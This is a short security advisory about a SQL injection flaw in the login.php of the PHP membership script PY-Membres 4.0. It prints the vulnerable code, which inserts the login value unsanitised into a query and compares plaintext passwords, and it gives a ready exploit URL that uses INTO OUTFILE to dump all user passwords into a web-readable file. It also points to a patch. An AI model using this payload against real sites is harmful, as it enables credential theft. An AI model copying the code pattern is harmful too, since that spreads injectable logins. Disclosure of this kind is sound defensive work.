PY-Membres 4.0 (PHP)

["Frog Man" <leseulfrog () hotmail com>]

Informations :
°°°°°°°°°°°°°°
Website : http://www.py-scripts.com/
Tested version : 4.0
PHP Config : magic_quotes_gpc=OFF
Problem : SQL Injection



PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

login.php :

------------------------------------------------------------------------
<?
session_start();
session_name("pys");
include("config.php");
include("functions.php");

est_vide($login,"Vous n\'avez pas saisi de login !");
est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
connexiondb();
$sql = "SELECT passwd FROM $db_table WHERE login='$login'";
$req = mysql_query($sql) or die('Erreur SQL 
!<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req);
if($data['passwd'] != $pass)
        {
        echo "<p>Mauvais login / password. Merci de recommencer</p>";
        mysql_close();
        exit;
        }
else
        {
        $ploginy=$login;
        session_register('ploginy');
        $ip=$REMOTE_ADDR;
        $host=gethostbyaddr($ip);
        $log=date("d/m/Y à H\hi | ");
        $log.=$ip." | ".$host;
	$action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE 
login='$ploginy'") or die (mysql_error()) ;
        mysql_close();
        Header("Location: membre.php");
        }
?>
------------------------------------------------------------------------





Exploit :
°°°°°°°°°
http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1

will save all users passwords into the file http://[target]/file.txt.


Solution :
°°°°°°°°°°
A patch can be found on http://www.phpsecure.info.


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°

http://www.frog-man.org/tutos/PY-Membres4.0.txt



frog-m@n


_________________________________________________________________